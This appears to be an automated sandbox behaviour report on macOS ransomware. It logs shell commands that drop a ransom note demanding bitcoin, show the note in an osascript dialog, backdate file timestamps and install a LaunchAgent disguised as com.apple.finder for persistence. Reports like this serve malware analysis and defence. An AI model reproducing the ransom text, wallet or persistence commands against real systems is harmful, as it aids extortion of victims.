Source: /var/root/Library/.FS_Store (PID: 842)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__35
Source: /var/root/Library/.FS_Store (PID: 842)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 845)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__36
Source: /var/root/Library/.FS_Store (PID: 845)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 848)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__37
Source: /var/root/Library/.FS_Store (PID: 848)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 851)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__38
Source: /var/root/Library/.FS_Store (PID: 851)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 854)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__39
Source: /var/root/Library/.FS_Store (PID: 854)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 857)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__40
Source: /var/root/Library/.FS_Store (PID: 857)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 860)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__41
Source: /var/root/Library/.FS_Store (PID: 860)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 863)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__42
Source: /var/root/Library/.FS_Store (PID: 863)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 866)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__43
Source: /var/root/Library/.FS_Store (PID: 866)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/sh (PID: 689)Grep executable: /usr/bin/grep -> grep Mac
Source: /bin/sh (PID: 693)Grep executable: /usr/bin/grep -> grep 2
Source: /bin/sh (PID: 707)Grep executable: /usr/bin/grep -> grep Mac
Source: /bin/sh (PID: 711)Grep executable: /usr/bin/grep -> grep 2
Source: /bin/sh (PID: 721)Grep executable: /usr/bin/grep -> grep Mac
Source: /bin/sh (PID: 725)Grep executable: /usr/bin/grep -> grep 2
Executes the "sysctl" command used to retrieve or modify kernel settingsShow sources
Source: /bin/sh (PID: 688)Sysctl executable: /usr/sbin/sysctl -> sysctl hw.model
Source: /bin/sh (PID: 694)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 696)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 706)Sysctl executable: /usr/sbin/sysctl -> sysctl hw.model
Source: /bin/sh (PID: 712)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 714)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 720)Sysctl executable: /usr/sbin/sysctl -> sysctl hw.model
Source: /bin/sh (PID: 726)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 728)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.physicalcpu
Executes the "touch" command used to create files or modify time stampsShow sources
Source: /bin/sh (PID: 698)Touch executable: /usr/bin/touch -> touch -ct 201606071012 /var/root/Library/.FS_Store
Source: /bin/sh (PID: 699)Touch executable: /usr/bin/touch -> touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 730)Touch executable: /usr/bin/touch -> touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 731)Touch executable: /usr/bin/touch -> touch -ct 201606071012 /var/root/Library/.FS_Store
Explicitly loads/starts launch servicesShow sources
Source: /bin/sh (PID: 701)Launch agent/daemon loaded: launchctl load /var/root/Library/LaunchAgents/com.apple.finder.plist
Explicitly unloads, stops, and/or removes launch servicesShow sources
Source: /bin/sh (PID: 700)Launch agent/daemon removed: launchctl remove com.apple.finder
Reads launchservices plist filesShow sources
Source: /var/root/Library/.FS_Store (PID: 718)Launchservices plist file read: /private/var/root/Library/Preferences/com.apple.LaunchServices.plist
Source: /var/root/Library/.FS_Store (PID: 718)Launchservices plist file read: /private/var/root/Library/Preferences/com.apple.LaunchServices.plist
Uses AppleScript framework/components containing Apple Script related functionalitiesShow sources
Source: /usr/bin/osascript (PID: 736)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 736)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 740)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 740)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 743)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 743)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 747)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 747)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 750)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 750)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 753)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 753)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 756)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 756)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 759)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 759)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 762)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 762)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 765)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 765)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 768)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 768)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 771)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 771)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 774)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 774)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 777)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 777)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 780)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 780)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 784)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 784)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 787)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 787)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 790)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 790)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 793)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 793)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 796)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 796)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 799)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 799)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 802)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 802)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 805)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 805)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 808)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 808)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 811)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 811)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 814)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 814)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 817)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 817)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 820)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 820)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 823)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 823)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 826)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 826)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 829)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 829)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 832)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 832)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 835)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 835)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 838)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 838)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 841)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 841)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 844)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 844)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 847)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 847)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 850)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 850)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 853)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 853)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 856)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 856)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 859)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 859)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 862)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 862)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /usr/bin/osascript (PID: 865)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 865)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Uses AppleScript scripting additions containing additional functionalities for Apple ScriptsShow sources
Source: /usr/bin/osascript (PID: 736)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 736)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 740)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 740)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 743)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 743)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 747)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 747)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 750)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 750)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
